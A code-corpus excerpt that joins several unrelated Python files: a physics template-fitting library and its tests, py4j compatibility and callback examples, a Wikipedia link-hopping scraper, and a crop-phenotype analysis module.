# need a dummy hist to generate proper binning
dummyHist = _to_TH1(np.zeros(self.observable.nbins), self.observable.binning, self.observable.name)
rooShape = ROOT.RooParametricHist(self.name, self.name, rooObservable, ROOT.RooArgList.fromiter(rooParams), dummyHist)
rooNorm = ROOT.RooAddition(self.name + '_norm', self.name + '_norm', ROOT.RooArgList.fromiter(rooParams))
workspace.add(rooShape)
workspace.add(rooNorm)
else:
if self.PreferRooParametricHist:
warnings.warn("Could not load RooParametricHist, falling back to RooParametricStepFunction, which has strange rounding issues.\n"
"Set ParametericSample.PreferRooParametricHist = False to disable this warning",
RuntimeWarning)
# RooParametricStepFunction expects parameters to represent PDF density (i.e. bin width normalized, and integrates to 1)
norm = _pairwise_sum(params)
norm.name = self.name + '_norm'
norm.intermediate = False
binw = np.diff(self.observable.binning)
dparams = params / binw / norm
for p, oldp in zip(dparams, params):
p.name = oldp.name + "_density"
p.intermediate = False
# The last bin value is defined by 1 - sum(others), so no need to render it
rooParams = [p.renderRoofit(workspace) for p in dparams[:-1]]
rooShape = ROOT.RooParametricStepFunction(self.name, self.name,
rooObservable,
ROOT.RooArgList.fromiter(rooParams),
self.observable.binningTArrayD(),
self.observable.nbins
)
workspace.add(rooShape)
rooNorm = norm.renderRoofit(workspace) # already rendered but we want to return it
elif rooShape == None or rooNorm == None: # noqa: E711
raise RuntimeError('Channel %r has either a shape or norm already embedded in workspace %r' % (self, workspace))
rooShape = workspace.pdf(self.name)
rooNorm = workspace.function(self.name + '_norm')
return rooShape, rooNorm
def combineNormalization(self):
'''
        For combine, the normalization in the card is used to scale the parametric process PDF
Since we provide an explicit normalization function, this should always stay at 1.
'''
# TODO: optionally we could set the normalization here and leave only normalization modifiers
return 1.
def combineParamEffect(self, param):
'''
Combine cannot build shape param effects for parameterized templates, so we have to do it in the model.
'''
return '-'
class TransferFactorSample(ParametericSample):
def __init__(self, name, sampletype, transferfactor, dependentsample, observable=None):
'''
Create a sample that depends on another Sample by some transfer factor.
The transfor factor can be a constant, an array of parameters of same length
as the dependent sample binning, or a matrix of parameters where the second
dimension matches the sample binning, i.e. expectation = tf @ dependent_expectation.
The latter requires an additional observable argument to specify the definition of the first dimension.
In all cases, please use numpy object arrays of Parameter types.
'''
if not isinstance(transferfactor, np.ndarray):
raise ValueError("Transfer factor is not a numpy array")
if not isinstance(dependentsample, Sample):
raise ValueError("Dependent sample does not inherit from Sample")
if len(transferfactor.shape) == 2:
if observable is None:
raise ValueError("Transfer factor is 2D array, please provide an observable")
params = np.dot(transferfactor, dependentsample.getExpectation())
elif len(transferfactor.shape) <= 1:
observable = dependentsample.observable
params = transferfactor * dependentsample.getExpectation()
else:
raise ValueError("Transfer factor has invalid dimension")
super(TransferFactorSample, self).__init__(name, sampletype, observable, params)
self._transferfactor = transferfactor
self._dependentsample = dependentsample
@property
def transferfactor(self):
return self._transferfactor
@property
def dependentsample(self):
return self._dependentsample
```
#### File: rhalphalib/tests/test_rhalphalib.py
```python
from __future__ import print_function, division
import sys
import os
import rhalphalib as rl
import numpy as np
import scipy.stats
import pickle
import ROOT
rl.util.install_roofit_helpers()
rl.ParametericSample.PreferRooParametricHist = False
def expo_sample(norm, scale, obs):
cdf = scipy.stats.expon.cdf(scale=scale, x=obs.binning) * norm
return (np.diff(cdf), obs.binning, obs.name)
def gaus_sample(norm, loc, scale, obs):
cdf = scipy.stats.norm.cdf(loc=loc, scale=scale, x=obs.binning) * norm
return (np.diff(cdf), obs.binning, obs.name)
def test_rhalphabet(tmpdir):
throwPoisson = False
jec = rl.NuisanceParameter('CMS_jec', 'lnN')
massScale = rl.NuisanceParameter('CMS_msdScale', 'shape')
lumi = rl.NuisanceParameter('CMS_lumi', 'lnN')
tqqeffSF = rl.IndependentParameter('tqqeffSF', 1., 0, 10)
tqqnormSF = rl.IndependentParameter('tqqnormSF', 1., 0, 10)
ptbins = np.array([450, 500, 550, 600, 675, 800, 1200])
npt = len(ptbins) - 1
msdbins = np.linspace(40, 201, 24)
msd = rl.Observable('msd', msdbins)
# here we derive these all at once with 2D array
ptpts, msdpts = np.meshgrid(ptbins[:-1] + 0.3 * np.diff(ptbins), msdbins[:-1] + 0.5 * np.diff(msdbins), indexing='ij')
rhopts = 2*np.log(msdpts/ptpts)
ptscaled = (ptpts - 450.) / (1200. - 450.)
rhoscaled = (rhopts - (-6)) / ((-2.1) - (-6))
validbins = (rhoscaled >= 0) & (rhoscaled <= 1)
rhoscaled[~validbins] = 1 # we will mask these out later
# Build qcd MC pass+fail model and fit to polynomial
qcdmodel = rl.Model("qcdmodel")
qcdpass, qcdfail = 0., 0.
for ptbin in range(npt):
failCh = rl.Channel("ptbin%d%s" % (ptbin, 'fail'))
passCh = rl.Channel("ptbin%d%s" % (ptbin, 'pass'))
qcdmodel.addChannel(failCh)
qcdmodel.addChannel(passCh)
# mock template
ptnorm = 1
failTempl = expo_sample(norm=ptnorm*1e5, scale=40, obs=msd)
passTempl = expo_sample(norm=ptnorm*1e3, scale=40, obs=msd)
failCh.setObservation(failTempl)
passCh.setObservation(passTempl)
qcdfail += failCh.getObservation().sum()
qcdpass += passCh.getObservation().sum()
qcdeff = qcdpass / qcdfail
tf_MCtempl = rl.BernsteinPoly("tf_MCtempl", (2, 2), ['pt', 'rho'], limits=(0, 10))
tf_MCtempl_params = qcdeff * tf_MCtempl(ptscaled, rhoscaled)
for ptbin in range(npt):
failCh = qcdmodel['ptbin%dfail' % ptbin]
passCh = qcdmodel['ptbin%dpass' % ptbin]
failObs = failCh.getObservation()
qcdparams = np.array([rl.IndependentParameter('qcdparam_ptbin%d_msdbin%d' % (ptbin, i), 0) for i in range(msd.nbins)])
sigmascale = 10.
scaledparams = failObs * (1 + sigmascale/np.maximum(1., np.sqrt(failObs)))**qcdparams
fail_qcd = rl.ParametericSample('ptbin%dfail_qcd' % ptbin, rl.Sample.BACKGROUND, msd, scaledparams)
failCh.addSample(fail_qcd)
pass_qcd = rl.TransferFactorSample('ptbin%dpass_qcd' % ptbin, rl.Sample.BACKGROUND, tf_MCtempl_params[ptbin, :], fail_qcd)
passCh.addSample(pass_qcd)
failCh.mask = validbins[ptbin]
passCh.mask = validbins[ptbin]
qcdfit_ws = ROOT.RooWorkspace('qcdfit_ws')
simpdf, obs = qcdmodel.renderRoofit(qcdfit_ws)
qcdfit = simpdf.fitTo(obs,
ROOT.RooFit.Extended(True),
ROOT.RooFit.SumW2Error(True),
ROOT.RooFit.Strategy(2),
ROOT.RooFit.Save(),
ROOT.RooFit.Minimizer('Minuit2', 'migrad'),
ROOT.RooFit.PrintLevel(-1),
)
qcdfit_ws.add(qcdfit)
if "pytest" not in sys.modules:
qcdfit_ws.writeToFile(os.path.join(str(tmpdir), 'testModel_qcdfit.root'))
if qcdfit.status() != 0:
raise RuntimeError('Could not fit qcd')
param_names = [p.name for p in tf_MCtempl.parameters.reshape(-1)]
decoVector = rl.DecorrelatedNuisanceVector.fromRooFitResult(tf_MCtempl.name + '_deco', qcdfit, param_names)
tf_MCtempl.parameters = decoVector.correlated_params.reshape(tf_MCtempl.parameters.shape)
tf_MCtempl_params_final = tf_MCtempl(ptscaled, rhoscaled)
tf_dataResidual = rl.BernsteinPoly("tf_dataResidual", (2, 2), ['pt', 'rho'], limits=(0, 10))
tf_dataResidual_params = tf_dataResidual(ptscaled, rhoscaled)
tf_params = qcdeff * tf_MCtempl_params_final * tf_dataResidual_params
# build actual fit model now
model = rl.Model("testModel")
for ptbin in range(npt):
for region in ['pass', 'fail']:
ch = rl.Channel("ptbin%d%s" % (ptbin, region))
model.addChannel(ch)
isPass = region == 'pass'
ptnorm = 1.
templates = {
'wqq': gaus_sample(norm=ptnorm*(100 if isPass else 300), loc=80, scale=8, obs=msd),
'zqq': gaus_sample(norm=ptnorm*(200 if isPass else 100), loc=91, scale=8, obs=msd),
'tqq': gaus_sample(norm=ptnorm*(40 if isPass else 80), loc=150, scale=20, obs=msd),
'hqq': gaus_sample(norm=ptnorm*(20 if isPass else 5), loc=125, scale=8, obs=msd),
}
for sName in ['zqq', 'wqq', 'tqq', 'hqq']:
# some mock expectations
templ = templates[sName]
stype = rl.Sample.SIGNAL if sName == 'hqq' else rl.Sample.BACKGROUND
sample = rl.TemplateSample(ch.name + '_' + sName, stype, templ)
# mock systematics
jecup_ratio = np.random.normal(loc=1, scale=0.05, size=msd.nbins)
msdUp = np.linspace(0.9, 1.1, msd.nbins)
msdDn = np.linspace(1.2, 0.8, msd.nbins)
# for jec we set lnN prior, shape will automatically be converted to norm systematic
sample.setParamEffect(jec, jecup_ratio)
sample.setParamEffect(massScale, msdUp, msdDn)
sample.setParamEffect(lumi, 1.027)
ch.addSample(sample)
# make up a data_obs, with possibly different yield values
templates = {
'wqq': gaus_sample(norm=ptnorm*(100 if isPass else 300), loc=80, scale=8, obs=msd),
'zqq': gaus_sample(norm=ptnorm*(200 if isPass else 100), loc=91, scale=8, obs=msd),
'tqq': gaus_sample(norm=ptnorm*(40 if isPass else 80), loc=150, scale=20, obs=msd),
'hqq': gaus_sample(norm=ptnorm*(20 if isPass else 5), loc=125, scale=8, obs=msd),
'qcd': expo_sample(norm=ptnorm*(1e3 if isPass else 1e5), scale=40, obs=msd),
}
yields = sum(tpl[0] for tpl in templates.values())
if throwPoisson:
yields = np.random.poisson(yields)
data_obs = (yields, msd.binning, msd.name)
ch.setObservation(data_obs)
# drop bins outside rho validity
mask = validbins[ptbin]
# blind bins 11, 12, 13
# mask[11:14] = False
ch.mask = mask
for ptbin in range(npt):
failCh = model['ptbin%dfail' % ptbin]
passCh = model['ptbin%dpass' % ptbin]
qcdparams = np.array([rl.IndependentParameter('qcdparam_ptbin%d_msdbin%d' % (ptbin, i), 0) for i in range(msd.nbins)])
initial_qcd = failCh.getObservation().astype(float) # was integer, and numpy complained about subtracting float from it
for sample in failCh:
initial_qcd -= sample.getExpectation(nominal=True)
if np.any(initial_qcd < 0.):
raise ValueError("initial_qcd negative for some bins..", initial_qcd)
sigmascale = 10 # to scale the deviation from initial
scaledparams = initial_qcd * (1 + sigmascale/np.maximum(1., np.sqrt(initial_qcd)))**qcdparams
fail_qcd = rl.ParametericSample('ptbin%dfail_qcd' % ptbin, rl.Sample.BACKGROUND, msd, scaledparams)
failCh.addSample(fail_qcd)
pass_qcd = rl.TransferFactorSample('ptbin%dpass_qcd' % ptbin, rl.Sample.BACKGROUND, tf_params[ptbin, :], fail_qcd)
passCh.addSample(pass_qcd)
tqqpass = passCh['tqq']
tqqfail = failCh['tqq']
tqqPF = tqqpass.getExpectation(nominal=True).sum() / tqqfail.getExpectation(nominal=True).sum()
tqqpass.setParamEffect(tqqeffSF, 1*tqqeffSF)
tqqfail.setParamEffect(tqqeffSF, (1 - tqqeffSF) * tqqPF + 1)
tqqpass.setParamEffect(tqqnormSF, 1*tqqnormSF)
tqqfail.setParamEffect(tqqnormSF, 1*tqqnormSF)
# Fill in muon CR
for region in ['pass', 'fail']:
ch = rl.Channel("muonCR%s" % (region, ))
model.addChannel(ch)
isPass = region == 'pass'
templates = {
'tqq': gaus_sample(norm=10*(30 if isPass else 60), loc=150, scale=20, obs=msd),
'qcd': expo_sample(norm=10*(5e2 if isPass else 1e3), scale=40, obs=msd),
}
for sName, templ in templates.items():
stype = rl.Sample.BACKGROUND
sample = rl.TemplateSample(ch.name + '_' + sName, stype, templ)
# mock systematics
jecup_ratio = np.random.normal(loc=1, scale=0.05, size=msd.nbins)
sample.setParamEffect(jec, jecup_ratio)
ch.addSample(sample)
# make up a data_obs
templates = {
'tqq': gaus_sample(norm=10*(30 if isPass else 60), loc=150, scale=20, obs=msd),
'qcd': expo_sample(norm=10*(5e2 if isPass else 1e3), scale=40, obs=msd),
}
yields = sum(tpl[0] for tpl in templates.values())
if throwPoisson:
yields = np.random.poisson(yields)
data_obs = (yields, msd.binning, msd.name)
ch.setObservation(data_obs)
tqqpass = model['muonCRpass_tqq']
tqqfail = model['muonCRfail_tqq']
tqqPF = tqqpass.getExpectation(nominal=True).sum() / tqqfail.getExpectation(nominal=True).sum()
tqqpass.setParamEffect(tqqeffSF, 1*tqqeffSF)
tqqfail.setParamEffect(tqqeffSF, (1 - tqqeffSF) * tqqPF + 1)
tqqpass.setParamEffect(tqqnormSF, 1*tqqnormSF)
tqqfail.setParamEffect(tqqnormSF, 1*tqqnormSF)
with open(os.path.join(str(tmpdir), 'testModel.pkl'), "wb") as fout:
pickle.dump(model, fout)
model.renderCombine(os.path.join(str(tmpdir), 'testModel'))
def test_monojet(tmpdir):
model = rl.Model("testMonojet")
# lumi = rl.NuisanceParameter('CMS_lumi', 'lnN')
jec = rl.NuisanceParameter('CMS_jec', 'shape')
ele_id_eff = rl.NuisanceParameter('CMS_ele_id_eff', 'shape')
pho_id_eff = rl.NuisanceParameter('CMS_pho_id_eff', 'shape')
gamma_to_z_ewk = rl.NuisanceParameter('Theory_gamma_z_ewk', 'shape')
recoilbins = np.linspace(300, 1200, 13)
recoil = rl.Observable('recoil', recoilbins)
signalCh = rl.Channel("signalCh")
model.addChannel(signalCh)
zvvTemplate = expo_sample(1000, 400, recoil)
zvvJetsMC = rl.TemplateSample('zvvJetsMC', rl.Sample.BACKGROUND, zvvTemplate)
zvvJetsMC.setParamEffect(jec, np.random.normal(loc=1, scale=0.01, size=recoil.nbins))
# these parameters are large, should probably log-transform them
zvvBinYields = np.array([rl.IndependentParameter('tmp', b, 0, zvvTemplate[0].max()*2) for b in zvvTemplate[0]]) # name will be changed by ParametericSample
zvvJets = rl.ParametericSample('signalCh_zvvJets', rl.Sample.BACKGROUND, recoil, zvvBinYields)
signalCh.addSample(zvvJets)
dmTemplate = expo_sample(100, 800, recoil)
dmSample = rl.TemplateSample('signalCh_someDarkMatter', rl.Sample.SIGNAL, dmTemplate)
signalCh.addSample(dmSample)
signalCh.setObservation(expo_sample(1000, 400, recoil))
zllCh = rl.Channel("zllCh")
model.addChannel(zllCh)
zllTemplate = expo_sample(1000*6.6/20, 400, recoil)
zllJetsMC = rl.TemplateSample('zllJetsMC', rl.Sample.BACKGROUND, zllTemplate)
zllJetsMC.setParamEffect(jec, np.random.normal(loc=1, scale=0.05, size=recoil.nbins))
zllJetsMC.setParamEffect(ele_id_eff, np.random.normal(loc=1, scale=0.02, size=recoil.nbins), np.random.normal(loc=1, scale=0.02, size=recoil.nbins))
zllTransferFactor = zllJetsMC.getExpectation() / zvvJetsMC.getExpectation()
zllJets = rl.TransferFactorSample('zllCh_zllJets', rl.Sample.BACKGROUND, zllTransferFactor, zvvJets)
zllCh.addSample(zllJets)
otherbkgTemplate = expo_sample(200, 250, recoil)
otherbkg = rl.TemplateSample('zllCh_otherbkg', rl.Sample.BACKGROUND, otherbkgTemplate)
otherbkg.setParamEffect(jec, np.random.normal(loc=1, scale=0.01, size=recoil.nbins))
zllCh.addSample(otherbkg)
zllCh.setObservation(expo_sample(1200, 380, recoil))
gammaCh = rl.Channel("gammaCh")
model.addChannel(gammaCh)
gammaTemplate = expo_sample(2000, 450, recoil)
gammaJetsMC = rl.TemplateSample('gammaJetsMC', rl.Sample.BACKGROUND, gammaTemplate)
gammaJetsMC.setParamEffect(jec, np.random.normal(loc=1, scale=0.05, size=recoil.nbins))
gammaJetsMC.setParamEffect(pho_id_eff, np.random.normal(loc=1, scale=0.02, size=recoil.nbins))
gammaTransferFactor = gammaJetsMC.getExpectation() / zvvJetsMC.getExpectation()
gammaJets = rl.TransferFactorSample('gammaCh_gammaJets', rl.Sample.BACKGROUND, gammaTransferFactor, zvvJets)
gammaJets.setParamEffect(gamma_to_z_ewk, np.linspace(1.01, 1.05, recoil.nbins))
gammaCh.addSample(gammaJets)
gammaCh.setObservation(expo_sample(2000, 450, recoil))
with open(os.path.join(str(tmpdir), 'monojetModel.pkl'), "wb") as fout:
pickle.dump(model, fout)
model.renderCombine(os.path.join(str(tmpdir), 'monojetModel'))
if __name__ == '__main__':
if not os.path.exists('tmp'):
os.mkdir('tmp')
test_rhalphabet('tmp')
test_monojet('tmp')
```
|
{
"source": "JennEYoon/python-ml",
"score": 3
}
|
#### File: practice/mymods/myfunc.py
```python
def cube(x):
print(x**3)
return x**3
```
|
{
"source": "jenngeorge/kafka-practice",
"score": 2
}
|
#### File: site-packages/py4j/compat.py
```python
from __future__ import unicode_literals, absolute_import
import inspect
import sys
from threading import Thread
version_info = sys.version_info
if version_info[:2] == (2, 6):
from py4j.backport import WeakSet # noqa
else:
from weakref import WeakSet # noqa
if version_info[0] < 3:
def items(d):
return d.items()
def iteritems(d):
return d.iteritems()
def next(x):
return x.next()
range = xrange # noqa
long = long # noqa
basestring = basestring # noqa
unicode = unicode # noqa
bytearray2 = bytearray
unichr = unichr # noqa
bytestr = str
tobytestr = str
def isbytestr(s):
return isinstance(s, str)
def ispython3bytestr(s):
return False
def isbytearray(s):
return isinstance(s, bytearray)
def bytetoint(b):
return ord(b)
def bytetostr(b):
return b
def strtobyte(b):
return b
import Queue
Empty = Queue.Empty
Queue = Queue.Queue
else:
def items(d):
return list(d.items())
def iteritems(d):
return d.items()
next = next
range = range
long = int
basestring = str
unicode = str
bytearray2 = bytes
unichr = chr
bytestr = bytes
def tobytestr(s):
return bytes(s, "ascii")
def isbytestr(s):
return isinstance(s, bytes)
def ispython3bytestr(s):
return isinstance(s, bytes)
def isbytearray(s):
return isinstance(s, bytearray)
def bytetoint(b):
return b
def bytetostr(b):
return str(b, encoding="ascii")
def strtobyte(s):
return bytes(s, encoding="ascii")
import queue
Queue = queue.Queue
Empty = queue.Empty
if hasattr(inspect, "getattr_static"):
def hasattr2(obj, attr):
return bool(inspect.getattr_static(obj, attr, False))
else:
hasattr2 = hasattr
class CompatThread(Thread):
"""Compatibility Thread class.
Allows Python 2 Thread class to accept daemon kwarg in init.
"""
def __init__(self, *args, **kwargs):
daemon = None
try:
daemon = kwargs.pop("daemon")
except KeyError:
pass
super(CompatThread, self).__init__(*args, **kwargs)
if daemon:
self.daemon = daemon
```
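A minimal usage sketch (not part of py4j itself) of the compatibility helpers above: `CompatThread` accepts the `daemon` keyword on both Python 2 and 3, and `tobytestr`/`bytetostr` round-trip ASCII strings on either interpreter.
```python
from py4j.compat import CompatThread, tobytestr, bytetostr

def worker():
    # round-trip an ASCII string through the byte helpers
    print(bytetostr(tobytestr("hello")))

t = CompatThread(target=worker, daemon=True)
t.start()
t.join()
```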
#### File: py4j/tests/py4j_callback_listener_example.py
```python
from py4j.java_gateway import JavaGateway, CallbackServerParameters
class PythonListener(object):
def __init__(self, gateway):
self.gateway = gateway
def notify(self, obj):
print("Notified by Java")
print(obj)
gateway.jvm.System.out.println("Hello from python!")
return "A Return Value"
class Java:
implements = ["py4j.examples.ExampleListener"]
if __name__ == "__main__":
gateway = JavaGateway(
callback_server_parameters=CallbackServerParameters())
listener = PythonListener(gateway)
gateway.entry_point.registerListener(listener)
gateway.entry_point.notifyAllListeners()
gateway.shutdown()
```
|
{
"source": "jenngrannen/WikiHop",
"score": 3
}
|
#### File: jenngrannen/WikiHop/Wikihop.py
```python
import requests
from bs4 import BeautifulSoup, SoupStrainer
def readLinks(url):
result = requests.get(url)
c = result.content
bodySection = SoupStrainer(id="mw-content-text")
soup = BeautifulSoup(c, "html.parser", parse_only=bodySection)
#bodySection = soup.select("body > div:nth-of-type(3) > div:nth-of-type(3) > div:nth-of-type(4) > div")
childrenList = []
for a in soup.find_all('a', href=True):
childrenList.append(a['href'])
return childrenList
def filterLinkList(list):
result = [l for l in list if not any(s in l for s in (".png", ".svg", ".jpg", ":"))]
result = [l for l in result if "/wiki/" in l]
result = [l for l in result if "action=edit" not in l]
return result
def rewriteLinkList(list):
result = []
for l in list:
result.append("https://en.wikipedia.org" + l)
return result
class LinkClass:
linkName = ""
prevLink = None
def __init__(self, linkName, prevLink):
self.linkName = linkName
self.prevLink = prevLink
def convertListObjects(list, parent):
result = []
for l in list:
result.append(LinkClass(l, parent))
return result
def printObjList(list):
if list == None:
return
for l in list:
print(l.linkName)
# print(l.prevLink.linkName)
def check(list, endURL):
for l in list:
if l.linkName == endURL:
return True
return False
def getFinalLinks(start):
url = start.linkName
list = readLinks(url)
list = filterLinkList(list)
list = rewriteLinkList(list)
list = convertListObjects(list, start)
return list
def runIt(startURL, endURL, depth):
list = [LinkClass(startURL, None)]
count = 0
while not check(list, endURL) and count < depth:
tempList = []
for l in list:
tempList.extend(getFinalLinks(l))
#printObjList(tempList)
list = tempList
count = count + 1
if check(list, endURL):
goal = [l for l in list if l.linkName == endURL]
path = [goal[0].linkName]
p = goal[0]
while p.prevLink != None:
path.append(p.prevLink.linkName)
p = p.prevLink
return path[::-1]
return None
"""starturl = "https://en.wikipedia.org/wiki/Manu_propria"
endurl = "https://en.wikipedia.org/wiki/Roman_Republic"
print(runIt(starturl, endurl, 3))
"""
```
|
{
"source": "jennhsiao/ideotype",
"score": 3
}
|
#### File: ideotype/ideotype/analysis.py
```python
import os
import collections
import pandas as pd
import numpy as np
from numpy import genfromtxt
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error, r2_score
from SALib.analyze import rbd_fast
from ideotype import DATA_PATH
from ideotype.init_params import params_sample
from ideotype.data_process import read_data, process_sims, agg_sims
def run_rbdfast(N_sample, run_name):
"""
Sensitivity analysis through RBD-FAST method.
Parameters
----------
N_sample : int
number of samples to generate.
run_name : str
run name for batch sims.
"""
problem, param_values = params_sample(run_name, N_sample)
# * param_values cannot directly be used for rbd_fast analysis here
# since values change with each sampling
# read in previously saved param.csv file as np.matrix
fpath_read = os.path.join(os.path.expanduser('~'),
'upscale', 'params',
f'param_{run_name}.csv'
)
X = genfromtxt(fpath_read, delimiter=',', skip_header=1)
# TODO: still need code that reads in Y here
Y = []
# Calculate sensitivity index
Si = rbd_fast.analyze(problem, X, Y, print_to_console=False)
return Si
def run_pca(df, n):
"""
Run PCA on dataset.
Parameters
----------
df : np.matrix or pd.DataFrame
Data for PCA.
n : int
Number of components.
Returns
-------
Dataframe with all PC components.
"""
x = df
x = StandardScaler().fit_transform(x)
pca = PCA(n_components=n)
principalComponents = pca.fit_transform(x)
column_labels = [f'PC{comp+1}' for comp in np.arange(n)]
df_pca = pd.DataFrame(data=principalComponents,
columns=column_labels)
return pca, df_pca
def linear_mod(df, features, target, test_size=0.33):
"""
Linear model that operates from DF based on features & target.
Parameters
----------
df : pd.DataFrame
Dataframe to draw data for linear model.
features : list
List of features as strings used to construct linear model.
target : list
List of target as string.
test_size : float
Default as 0.33 - 33% of data set aside for testing.
"""
X = df[features]
y = df[target]
mod = LinearRegression(fit_intercept=True)
mod.fit(X, y)
y_pred = mod.predict(X)
coefs = mod.coef_
mse = mean_squared_error(y, y_pred)
r2 = r2_score(y, y_pred)
return coefs, mse, r2
def identify_top_phenos(run_name, n_pheno=5, w_yield=1, w_disp=1):
"""
Identify top performing phenotypes.
Parameters
----------
n_pheno : int
Number of top phenotypes to identify.
w_yield : int
Weight on importance of yield.
Value between 0 - 1.
w_disp : int
Weight on importance of yield dispersion.
Value between 0 - 1.
Returns
-------
df_pheno : pd.DataFrame
Dataframe with phenotype performance and site info for mapping.
mx_pheno : np.array
Matrix with site, pheno, and phenotype performance info for heatmap.
"""
df_sims, df_sites, df_wea, df_params, df_all, df_matured = read_data(
os.path.join(DATA_PATH, 'files', f'filepaths_{run_name}.yml'))
sites = sorted(list(set(df_all.site)))
phenos = list(set(df_all.cvar))
list_top_phenos = [[] for item in np.arange(n_pheno)]
# Identify high performing combinations
for site in sites:
# Filter out data for specific site
df_sub = df_all.query(f'site=="{site}"')
# Calculate mean yield and yield dispersion across years
# for specified site
yield_mean = df_sub.groupby('cvar').mean().dm_ear
yield_var = df_sub.groupby('cvar').var().dm_ear
yield_disp = yield_var/yield_mean
# Standardize yield_mean & yield_disp to values between 0 & 1
yield_mean_norm = (
yield_mean-yield_mean.min())/(yield_mean.max()-yield_mean.min())
yield_disp_norm = (
yield_disp-yield_disp.min())/(yield_disp.max()-yield_disp.min())
# Identify max yield and min dispersion
max_yield = yield_mean_norm.max()
min_disp = yield_disp_norm.min()
# Calculate distance to theoretical optimal
dist = [np.sqrt(
w_yield*(ymean - max_yield)**2 + w_disp*(ydisp - min_disp)**2)
for ymean, ydisp in zip(yield_mean_norm, yield_disp_norm)]
df_dist = pd.DataFrame(dist, columns=['dist'])
top_phenos = list(df_dist.nsmallest(n_pheno, 'dist').index)
for item in np.arange(len(list_top_phenos)):
top_pheno = top_phenos[item]
list_top_phenos[item].append(top_pheno)
# Set up dataframe with top performing pheno info
df_pheno = pd.DataFrame(list_top_phenos).transpose()
df_pheno.columns = [f'pheno{n+1}' for n in np.arange(n_pheno)]
df_pheno['sites'] = sites
df_pheno = pd.merge(df_pheno, df_sites, left_on='sites', right_on='site')
df_sites_sorted = pd.DataFrame(sites)
df_sites_sorted.columns = ['site']
df_sites_sorted['site_num'] = np.arange(len(sites))
df_pheno = pd.merge(
df_pheno, df_sites_sorted, left_on='sites', right_on='site')
# Initiate empty matrix
mx_pheno = np.empty(shape=[len(phenos), len(sites)])
mx_pheno[:] = np.nan
# Fill in matrix data
for item in np.arange(n_pheno):
mx_pheno[df_pheno[f'pheno{item+1}'], df_pheno['site_num']] = item + 1
return(df_pheno, mx_pheno)
def top_pheno_prevalence(run_name, n_pheno, intervals):
"""
Identify the prevalence of top performing phenotypes.
Parameters
----------
run_name : str
Simulation run name.
n_pheno : int
Number of top phenotypes to identify.
intervals : int
Number of intervals to create for yield and dispersion weights.
Returns
-------
df_pheno_prevalence : pd.DataFrame
"""
pheno_prevalences = []
list_intervals = [round(item, 2) for item in np.arange(
0, 1.000001, 1/intervals)]
w_yields = list_intervals.copy()
w_disps = list_intervals.copy()
w_disps.reverse()
for item in np.arange(intervals):
df_pheno, mx = identify_top_phenos(
run_name=run_name,
n_pheno=n_pheno,
w_yield=w_yields[item],
w_disp=w_disps[item])
# convert matrix with site and ranking info into dataframe
df = pd.DataFrame(mx)
# count the number of times each phenotype
# made it into top rankings (n_pheno) across all locations
pheno_prevalence = list(df.count(axis=1))
pheno_prevalences.append(pheno_prevalence)
df_pheno_prevalence = pd.DataFrame(pheno_prevalences).transpose()
return(df_pheno_prevalence)
def prevalent_top_pheno(run_name, n_pheno, w_yield, w_disp, site_threshold):
"""
Identify top performing and prevalent phenotypes.
Parameters
----------
run_name : str
site_threshold : int
Threshold for number of sites phenotype should at least have ranked
as top performer.
Returns
-------
list_top_pheno : list
List of top performing prevalent phenotypes.
"""
df_pheno, mx_pheno = identify_top_phenos(
run_name, n_pheno, w_yield, w_disp)
df_prevalence = pd.DataFrame(mx_pheno).notna().astype(int).sum(axis=1)
df_prevalence_sorted = df_prevalence.sort_values()
list_top_phenos = df_prevalence_sorted[
df_prevalence_sorted > site_threshold].index.tolist()
list_top_phenos.reverse()
return(list_top_phenos)
def rank_by_yield(df):
"""
Rank phenotypes by yield only.
Parameters
----------
df : pd.DataFrame
MAIZSIM yield output dataframe.
df_sims or df_mature
"""
# Prep data
groups = ['cvar', 'site']
how = 'mean'
sim = 'dm_ear'
mx_mean = agg_sims(df, groups, how, sim)
df_yield_means = pd.DataFrame(mx_mean)
# Sort data based on mean yield value
df_yield_means['mean'] = df_yield_means.mean(axis=1)
# Rank phenos by yield
phenos_ranked_by_yield = list(df_yield_means.sort_values(by=['mean'],
axis=0, ascending=False).index)
return phenos_ranked_by_yield
def rank_all_phenos(run_name, n_pheno, w_yield, w_disp):
"""
Rank performance for all phenotypes across all locations.
Parameters
----------
run_name : str
n_pheno : int
w_yield : float
w_disp : float
Returns
-------
phenos_ranked : list
"""
# Identify ranking for all phenotypes
df_pheno, mx = identify_top_phenos(
run_name, n_pheno=n_pheno, w_yield=w_yield, w_disp=w_disp)
# Rank general performance for all phenotypes across all sites
performance = []
for site in np.arange(df_pheno.shape[0]):
# Select phenotypes ranked by performance from df_pheno
phenos = df_pheno.iloc[site, :n_pheno].tolist()
# Assign each phenotype a ranked value
# -- lower values mean better performance
pheno_ranks = np.arange(n_pheno)
# Compile phenotype and ranking info into dict
dict_rank = dict(zip(phenos, pheno_ranks))
# Sort dict to order by phenotype
dict_sorted = collections.OrderedDict(sorted(dict_rank.items()))
# Append ranking into list of performance
performance.append(list(dict_sorted.values()))
# Calculate performance
# -- phenotypes with lowest sum have best performance overall
df_rankings = pd.DataFrame(performance).transpose()
df_performance = df_rankings.sum(axis=1)
phenos_ranked = list(df_performance.sort_values(ascending=True).index)
return(df_rankings, phenos_ranked)
def rank_top_phenos(run_name, n_pheno, w_yield, w_disp):
"""
Rank phenotypes that at least rank top n at sim sites.
n_pheno : int
Ranking that phenotype at least should achieve.
"""
df_pheno, mx = identify_top_phenos(run_name,
n_pheno=n_pheno,
w_yield=w_yield,
w_disp=w_disp)
top_phenos = []
for item in np.arange(n_pheno):
# Identify phenotypes in each ranking for each site
top_pheno = list(set(df_pheno.iloc[:, item]))
top_phenos.extend(top_pheno)
# Compile all phenotypes
list_top_phenos = list(set(top_phenos))
# Determine prevalence of phenotype occurrence
rank_sums = []
for item in list_top_phenos:
rank_list = list(mx[item])
rank_list_reversed = [(n_pheno + 1) - rank for rank in rank_list]
rank_sum = np.nansum(rank_list_reversed)
rank_sums.append(rank_sum)
df_ranksum = pd.DataFrame({'pheno': list_top_phenos,
'rank_sum': rank_sums})
top_pheno_ranks = list(df_ranksum.sort_values(
'rank_sum', ascending=False)['pheno'])
return(top_pheno_ranks)
def identify_improved_phenos(n_pheno, w_yield, w_disp,
future_run, rank_cutoff=20):
"""
Identify improved phenotypes.
Parameters
----------
n_pheno : int
w_yield : int
w_disp : int
future_run : str
run_name of future sim ('f2050', 'f2100')
rank_cutoff : int
